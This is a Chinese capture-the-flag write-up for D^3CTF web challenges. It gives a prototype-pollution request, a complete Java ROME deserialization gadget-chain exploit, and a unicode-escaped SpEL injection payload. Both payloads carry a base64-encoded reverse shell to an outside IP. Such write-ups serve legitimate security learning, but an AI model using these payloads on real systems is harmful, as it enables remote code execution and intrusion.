D^3CTF web部分wp

2022-03-08
作者 fmyyy
~5.96K 字

1. shorter
2. ezsql

## d3oj

提示是尝试用oct用户登陆，翻组件版本看到个合适的
https://hackerone.com/reports/869574
编辑文章哪里很明显

 POST /article/0/edit HTTP/1.1
Host: xxx
User-Agent: xx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 62
Origin: xxx
Connection: close
Referer: xxxx
Cookie: connect.sid=xx
Upgrade-Insecure-Requests: 1

{"title":"test","content":{"__proto__":{
"is_admin":true
}}}

shorter

网上公开的只能缩短到2k
jiang师傅正好不久前就给我看过这个rome的新链子
https://www.yuque.com/jinjinshigekeaigui/qskpi5/cz1um4
结合许少的文章和jiang师傅的新rome链子可以缩短到一千多

package d3;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.syndication.feed.impl.EqualsBean;
import javassist.*;
import org.jboss.seam.util.Reflections;

import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;
import java.util.Hashtable;

public class exp1 {
    private static byte[] getTemplatesImpl(String cmd) throws CannotCompileException, IOException, NotFoundException {
        ClassPool pool = ClassPool.getDefault();
        CtClass ctClass = pool.makeClass("Evil");
        CtClass superClass = pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet");
        ctClass.setSuperclass(superClass);
        CtConstructor constructor = CtNewConstructor.make("    public Evil(){\n" +
                "        try {\n" +
                "            Runtime.getRuntime().exec(\"" + cmd + "\");\n" +
                "        }catch (Exception ignored){}\n" +
                "    }", ctClass);
        ctClass.addConstructor(constructor);
        byte[] bytes = ctClass.toBytecode();
        ctClass.defrost();
        return bytes;
    }

    public static void setFieldValue(Object obj, String fieldname, Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(fieldname);
        field.setAccessible(true);
        field.set(obj,value);
    }

    public static byte[] serialize(Object o) throws Exception{
        try(ByteArrayOutputStream baout = new ByteArrayOutputStream();
            ObjectOutputStream oout = new ObjectOutputStream(baout)){
            oout.writeObject(o);
            return baout.toByteArray();
        }
    }


    public static void main(String[] args) throws Exception {



        TemplatesImpl tmpl = new TemplatesImpl();
        Field bytecodes = Reflections.getField(tmpl.getClass(),"_bytecodes");
        setFieldValue(tmpl,"_bytecodes",new byte[][]{getTemplatesImpl("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuNzAuNDAuNS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}")});

        Field name=Reflections.getField(tmpl.getClass(),"_name");
        setFieldValue(tmpl,"_name","s");


        EqualsBean bean = new EqualsBean(String.class,"s");

        HashMap map1 = new HashMap();
        HashMap map2 = new HashMap();
        map1.put("yy",bean);
        map1.put("zZ",tmpl);
        map2.put("zZ",bean);
        map2.put("yy",tmpl);
        Hashtable table = new Hashtable();
        table.put(map1,"1");
        table.put(map2,"2");

        setFieldValue(bean,"_beanClass", Templates.class);
        setFieldValue(bean,"_obj",tmpl);
        byte[] s = serialize(table);
        byte[] payload = Base64.getEncoder().encode(s);
        System.out.print(new String(payload));

ezsql

存在el注入的地方，但把new过滤了，想到编码绕过。

1	\\\\u([0-9A-Fa-f]{4})

这个正则可以绕，只要两个或两个以上的u即可，比如${\uu006eew String(“123”)}
在这里插入图片描述
直接spel注入，但直接传似乎是有符号问题？直接全部编码就好了

new javax.script.ScriptEngineManager().getEngineByName(\"js\").eval(\"java.lang.Runtime.getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuNzAuNDAuNS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}')\")"

编码后

${\uu006e\uu0065\uu0077\uu0020\uu006a\uu0061\uu0076\uu0061\uu0078\uu002e\uu0073\uu0063\uu0072\uu0069\uu0070\uu0074\uu002e\uu0053\uu0063\uu0072\uu0069\uu0070\uu0074\uu0045\uu006e\uu0067\uu0069\uu006e\uu0065\uu004d\uu0061\uu006e\uu0061\uu0067\uu0065\uu0072\uu0028\uu0029\uu002e\uu0067\uu0065\uu0074\uu0045\uu006e\uu0067\uu0069\uu006e\uu0065\uu0042\uu0079\uu004e\uu0061\uu006d\uu0065\uu0028\uu0022\uu006a\uu0073\uu0022\uu0029\uu002e\uu0065\uu0076\uu0061\uu006c\uu0028\uu0022\uu006a\uu0061\uu0076\uu0061\uu002e\uu006c\uu0061\uu006e\uu0067\uu002e\uu0052\uu0075\uu006e\uu0074\uu0069\uu006d\uu0065\uu002e\uu0067\uu0065\uu0074\uu0052\uu0075\uu006e\uu0074\uu0069\uu006d\uu0065\uu0028\uu0029\uu002e\uu0065\uu0078\uu0065\uu0063\uu0028\uu0027\uu0062\uu0061\uu0073\uu0068\uu0020\uu002d\uu0063\uu0020\uu007b\uu0065\uu0063\uu0068\uu006f\uu002c\uu0059\uu006d\uu0046\uu007a\uu0061\uu0043\uu0041\uu0074\uu0061\uu0053\uu0041\uu002b\uu004a\uu0069\uu0041\uu0076\uu005a\uu0047\uu0056\uu0032\uu004c\uu0033\uu0052\uu006a\uu0063\uu0043\uu0038\uu0078\uu004d\uu006a\uu0051\uu0075\uu004e\uu007a\uu0041\uu0075\uu004e\uu0044\uu0041\uu0075\uu004e\uu0053\uu0038\uu0078\uu004d\uu006a\uu004d\uu0030\uu0049\uu0044\uu0041\uu002b\uu004a\uu006a\uu0045\uu003d\uu007d\uu007c\uu007b\uu0062\uu0061\uu0073\uu0065\uu0036\uu0034\uu002c\uu002d\uu0064\uu007d\uu007c\uu007b\uu0062\uu0061\uu0073\uu0068\uu002c\uu002d\uu0069\uu007d\uu0027\uu0029\uu0022\uu0029}

在这里插入图片描述

哈哈赛后我hxd告诉我有个类可以直接执行不需要new
${@jdk.jshell.JShell@create().eval('java.lang.Runtime.getRuntime().exec("")}

学到了学到了

fmyyy

shorter

ezsql

本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可

本作品采用知识共享署名-相同方式共享 4.0 国际许可协议进行许可